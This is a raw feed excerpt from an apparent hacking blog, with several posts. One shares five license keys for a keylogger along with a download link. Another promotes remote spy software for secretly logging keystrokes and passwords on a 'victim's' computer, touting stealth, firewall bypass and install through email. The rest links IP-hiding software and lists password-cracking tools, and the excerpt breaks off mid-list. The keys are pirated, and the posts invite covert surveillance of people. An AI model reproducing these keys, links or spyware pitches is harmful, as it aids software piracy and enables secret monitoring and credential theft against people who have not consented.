dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&amp;nbsp;I got 5 serial keys for very useful software called Elite Keylogger, so I decided to share them with you. Elite Keystroke Recorder is the most powerful surveillance keylogger for monitoring and recording every detail of PC and Internet activity everywhere: at home or in the office. Additionally, it’s a totally invisible keystroke recorder! While the demo version might be detected by some antiviruses, all registered clients get the special version of Elite Keylogger which cannot be detected and is daily updated for them. &lt;span id=&quot;more-1110&quot;&gt;&lt;/span&gt;&lt;br /&gt;
Serial Keys :&lt;br /&gt;
HacksPC1&lt;br /&gt;
000HWN-YV1AYQ-EQRRM4-4ATVYN-64KZ8R-H188PG-XKJ0E5-DE9913-499495-520F45-DE343F-04DFD1-157CCB&lt;br /&gt;
HacksPC2&lt;br /&gt;
000H21-M4GXU5-Z2RFTV-C7JPPE-G83K3C-2EWFAV-MZB9D5-6FE928-61DD4E-16FA4A-6926CE-BC65F1-FC1959&lt;br /&gt;
HacksPC3&lt;br /&gt;
000GXH-QURWY8-EQ3YMR-TU8MET-QB7YHC-GWUY6C-V0AZD0-13B099-F6C681-EE540C-10A36C-BDDB86-AFE24A&lt;br /&gt;
HacksPC4&lt;br /&gt;
000K2U-4RC1F9-UHJ9EU-N9QM60-DUY6BK-2F8KC2-DNKQ0E-89F58F-EF8BD3-F19A7F-2DAB1A-D30688-CBD70B&lt;br /&gt;
HacksPC5&lt;br /&gt;
0000T9-TJM0TM-KFG5W8-A7QC25-8X38XM-X4TZUZ-WTENZK-C7C483-9765D2-AABC3F-FE4406-A7ACB5-909664&lt;br /&gt;
&lt;img alt=&quot;keylogger&quot; class=&quot;alignnone size-full 
wp-image-1111&quot; height=&quot;120&quot; src=&quot;http://free-stuffonline.com/wp-content/uploads/2010/02/keylogger.jpg&quot; title=&quot;keylogger&quot; width=&quot;602&quot; /&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;a href=&quot;http://widestep.com/files/ek_setup.exe&quot;&gt;DOWNLOAD ELITE  KEYLOGGER&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/1206456145890719816/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/download-free-elite-keylogger-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1206456145890719816'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1206456145890719816'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/download-free-elite-keylogger-with.html' title='download Free Elite Keylogger with Serials Keys'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-4775258031774119643</id><published>2011-05-08T00:42:00.000-07:00</published><updated>2011-05-08T00:42:46.199-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="IP Hidening"/><title type='text'>Hide IP address software</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;253&quot; src=&quot;http://lh6.ggpht.com/_s8rlBvhBNsI/TULHh4nsXRI/AAAAAAAAAWA/fq5E2LQI6pg/RealHideIP.png&quot; width=&quot;400&quot; /&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #660000;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #660000;&quot;&gt;Hide your Real IP and surf over IP based  service with a fake IP and fake and fake location &lt;/span&gt;&lt;br style=&quot;color: #660000;&quot; /&gt;&lt;span style=&quot;color: #660000;&quot;&gt;With  this Software.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;a href=&quot;http://cid-ecbf74d548e8476a.office.live.com/self.aspx/Complete%20World%20Downloads/RealHideIP-4.0.9.2.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #660000;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://cid-ecbf74d548e8476a.office.live.com/self.aspx/Complete%20World%20Downloads/RealHideIP-4.0.9.2.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Downlaod&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/4775258031774119643/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hide-ip-address-software.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/4775258031774119643'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/4775258031774119643'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hide-ip-address-software.html' title='Hide IP address software'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://lh6.ggpht.com/_s8rlBvhBNsI/TULHh4nsXRI/AAAAAAAAAWA/fq5E2LQI6pg/s72-c/RealHideIP.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-7891220350956964801</id><published>2011-05-08T00:39:00.000-07:00</published><updated>2011-05-08T00:39:36.878-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Software"/><title type='text'>Remote password hacking software Download sniperspy</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #10121a; font-family: verdana; font-size: 11px; font-weight: normal;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;a href=&quot;http://www.sniperspy.com/images/box6b.gif&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img align=&quot;right&quot; alt=&quot;Remote password hacking software&quot; border=&quot;0&quot; height=&quot;164&quot; src=&quot;http://www.sniperspy.com/images/box6b.gif&quot; style=&quot;margin-top: 10px;&quot; width=&quot;149&quot; /&gt;&lt;/a&gt;&lt;i&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;SniperSpy&lt;/b&gt;&lt;a href=&quot;https://www.plimus.com/jsp/buynow.jsp?contractId=2160696&amp;amp;referrer=rafay112&quot;&gt; &lt;/a&gt;&lt;/span&gt;&lt;/i&gt;is the industry leading &lt;b&gt;Remote password hacking software&lt;/b&gt;&lt;a href=&quot;https://www.plimus.com/jsp/buynow.jsp?contractId=2160696&amp;amp;referrer=rafay112&quot;&gt; &lt;/a&gt;combined with the &lt;b&gt;Remote &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD10&quot;&gt;Install&lt;/span&gt; and Remote Viewing feature.&lt;/b&gt;&lt;br /&gt;
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!&amp;nbsp; This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!&lt;br /&gt;
&lt;b&gt;Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy&lt;/b&gt; allows you to remotely&amp;nbsp;spy&amp;nbsp;any&amp;nbsp;PC like a television! Watch what happens on the screen LIVE! &lt;b&gt;The only remote PC spy software with a SECURE control panel!&lt;/b&gt;&lt;br /&gt;
This Remote PC Spy&amp;nbsp;software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhNSsD3fDaWlhQNReD4CWRtYY0-gLzQj3W22l-oYHsv0iIvR5a5pdRzzR7m6eBgzhFr5oZI1In7sjLztBV40pB_oYRJFhgN6MS0s_OA9gQ3XIcQm_CCFQzxC6GMCX7zfBB16Dvslj6Bwk/s1600-h/sniper-spy.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;remote password hacking software&quot; border=&quot;0&quot; height=&quot;380&quot; sniperspy=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhNSsD3fDaWlhQNReD4CWRtYY0-gLzQj3W22l-oYHsv0iIvR5a5pdRzzR7m6eBgzhFr5oZI1In7sjLztBV40pB_oYRJFhgN6MS0s_OA9gQ3XIcQm_CCFQzxC6GMCX7zfBB16Dvslj6Bwk/s400/sniper-spy.gif&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsha4mvhvGWwVxJmJ9kBJrP4vfQJoD9vgU_G4UslwHt5rl4L687syDgBsHcU5-72obvR5u-ZtWS2U5jlNt14swHcY4z1e-o1FYlHGQ-N8iZ_VnjHyoyTNiTWHN9AuL027FZV1QgdH_FDw/s1600-h/sniperspy_2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;remote password hacking software&quot; border=&quot;0&quot; height=&quot;377&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsha4mvhvGWwVxJmJ9kBJrP4vfQJoD9vgU_G4UslwHt5rl4L687syDgBsHcU5-72obvR5u-ZtWS2U5jlNt14swHcY4z1e-o1FYlHGQ-N8iZ_VnjHyoyTNiTWHN9AuL027FZV1QgdH_FDw/s400/sniperspy_2.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;SniperSpy Features:&lt;/b&gt;&lt;br /&gt;
1. SniperSpy is remotely-deployable spy software&lt;br /&gt;
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!&lt;br /&gt;
3. &lt;b&gt;Logs All Keystrokes&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhClgAIZKFFqvXebvQVCzCqJNySUoZWbiix_RLrdLCkVNkggFR5z8bA7voZj3PBkcQfVMtd6yvS_eXLuzft8jAQpCtRyPHLECrvmDust_l7p1s-3b2iE2tVysClNaj6nApDLaS_uLDnfRg/s1600-h/sniperspy_cheating_spouse_keylogger.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;remote password spying software&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhClgAIZKFFqvXebvQVCzCqJNySUoZWbiix_RLrdLCkVNkggFR5z8bA7voZj3PBkcQfVMtd6yvS_eXLuzft8jAQpCtRyPHLECrvmDust_l7p1s-3b2iE2tVysClNaj6nApDLaS_uLDnfRg/s320/sniperspy_cheating_spouse_keylogger.jpg&quot; title=&quot;Monitor a PC&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
4. Records any Password (Email, Login, Instant &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;Messenger&lt;/span&gt; etc.)&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE576hZ9n-i79dEzWX0v43mpnGydxMIhwI9NF7HsEz7tcirkCU_eOGMC8DcVV_VCjhJiKbztZG90WdArXkBPUK3jMgwUq25OzfF2yp0qzugftJobcwcJCGuLnHt_8SMN28azUn2HZGgLU/s1600-h/SniperSpy3+%281%29.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;255&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE576hZ9n-i79dEzWX0v43mpnGydxMIhwI9NF7HsEz7tcirkCU_eOGMC8DcVV_VCjhJiKbztZG90WdArXkBPUK3jMgwUq25OzfF2yp0qzugftJobcwcJCGuLnHt_8SMN28azUn2HZGgLU/s400/SniperSpy3+%281%29.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
5.&amp;nbsp;Remote Monitor&amp;nbsp;Entire IM Conversations so that you can spy on IM activities too&lt;br /&gt;
6. Captures a full-size jpg &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;picture&lt;/span&gt; of the active window however often you wish&lt;br /&gt;
7. Real Time Screen Viewer&lt;br /&gt;
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user&lt;br /&gt;
9. Completely Bypasses any Firewall&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What if i dont have physical acess to victims computer?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgODvbM2tX-SJkQURwNlwfBssz-alyttO3ndDBYW51edfnTMbO0WFv8yR2WDBvX5VMpUPFdvVz8adK5DfnDZez5v6Gkc1ZlR8445-loWgWDLHUIA8mzn1pIT4hasdK2INAQjHoyqEeHJA0/s1600-h/sniperspy3.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;remote password hacking software&quot; border=&quot;0&quot; height=&quot;230&quot; rafayhackingarticles.blogspot.com=&quot;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgODvbM2tX-SJkQURwNlwfBssz-alyttO3ndDBYW51edfnTMbO0WFv8yR2WDBvX5VMpUPFdvVz8adK5DfnDZez5v6Gkc1ZlR8445-loWgWDLHUIA8mzn1pIT4hasdK2INAQjHoyqEeHJA0/s400/sniperspy3.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;No physical access to your remote PC is needed to install the &lt;b&gt;spy software. &lt;/b&gt;Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.&lt;br /&gt;
&lt;br /&gt;
This software remotely installs to your computer through email. Unlike the other remote spy titles on the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;market&lt;/span&gt;, &lt;b style=&quot;color: #3d85c6;&quot;&gt;S&lt;/b&gt;&lt;b style=&quot;color: #3d85c6;&quot;&gt;niperSpy&lt;/b&gt; is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.&lt;br /&gt;
&lt;br /&gt;
The &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;program&lt;/span&gt; then records user activities and sends the data to your online account. You login to &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD9&quot;&gt;your account&lt;/span&gt; SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Why would I need SniperSpy?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt; &lt;/b&gt;&lt;br /&gt;
Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can&#39;t get to your computer and are worried about the Internet safety or habits of those using it, &lt;b&gt;then you NEED &lt;/b&gt;&lt;a href=&quot;https://www.plimus.com/&quot;&gt;&lt;b style=&quot;color: #3d85c6;&quot;&gt;SniperSpy&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
This high-tech spy software will allow you to see exactly &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot;&gt;what your&lt;/span&gt; teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot;&gt;company&lt;/span&gt; computer(s).&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/7891220350956964801/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/remote-password-hacking-software.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/7891220350956964801'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/7891220350956964801'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/remote-password-hacking-software.html' title='Remote password hacking software Download sniperspy'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhNSsD3fDaWlhQNReD4CWRtYY0-gLzQj3W22l-oYHsv0iIvR5a5pdRzzR7m6eBgzhFr5oZI1In7sjLztBV40pB_oYRJFhgN6MS0s_OA9gQ3XIcQm_CCFQzxC6GMCX7zfBB16Dvslj6Bwk/s72-c/sniper-spy.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-1851939672019827467</id><published>2011-05-08T00:34:00.000-07:00</published><updated>2011-05-08T00:34:28.569-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Software"/><title type='text'>Free Essential Hacking tools</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;A Hacking tool is a program which helps you in Hacking making it easier for you,Gone are those days when you have to do every thing manually,now a days Hacking tools have made work easier for you,Below i am posting some of Hacking tools essential for every Hacker out there to make the work alot easier,these tools are also actually a Kind of Security tools but it on you how you use them.&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;Free Essential Hacking tools For every Hacker:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP Tools:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP-Tools offers many TCP/IP utilities in one program. This award-winning Free Hacking tool can work under Windows 98/ME, Windows NT 4.0, Windows 2000/XP/2003, Windows Vista and is indispensable for anyone who uses the Internet or Intranet.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;It includes the following utilities&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;1.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Local Info – examines the local host and shows info about processor, memory, Winsock data, etc.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;2.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Name Scanner – scans all hostnames within a range of IP addresses&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;3.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Port Scanner – scans network(s) for active TCP based services&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;4.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Ping Scanner – pings a remote hosts over the network&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;5.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Telnet – telnet client&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;6.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;HTTP – HTTP client&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;7.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP-Monitor – shows network traffic in real time &amp;amp; many more&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;8.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;IP TOOLS has almost all the utilities built into it.So there is no need to use seperate tools for every indivisual process of hacking such as Port scanning,Whois scanning,IP monitor etc.It’s like a hacking tool kit which has all the necessary tools for hacking.&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;a href=&quot;http://www.ks-soft.net/ip-tools.eng/downpage.htm&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Download IP Tools Here&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Cain and Able:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;clear: left; float: left; font-family: Verdana,sans-serif; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Hack computer&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1LJ4FvXl35rK-xXHD6eXk2PFDYfg8ezrGCCOUe0vBEGClbD_PKhJopoBHId3LbfzCl445BiWvRoTvmdzfV29j4R57rHzlNBsKiMhZn_VJr2IhvRVxQ9iNDxwi9ARdKBHhbFJUS5ACGgs/s320/wolfgang-router2-pic1.jpg&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Cain and Abel (sometimes called simply &quot;Cain&quot;) is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel. Cain and Abel is maintained by Massimiliano Montoro.I have made a tutorial on &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Hack a Computer with&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Cain and able&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&amp;nbsp;OR&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b&gt;&lt;a href=&quot;http://www.oxid.it/cain.html&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #3d85c6;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Download Cain and Able Here&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;Brutus ( Password Cracker)&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana,sans-serif;&quot;&gt;:&lt;/span&gt;&lt;br /&gt;
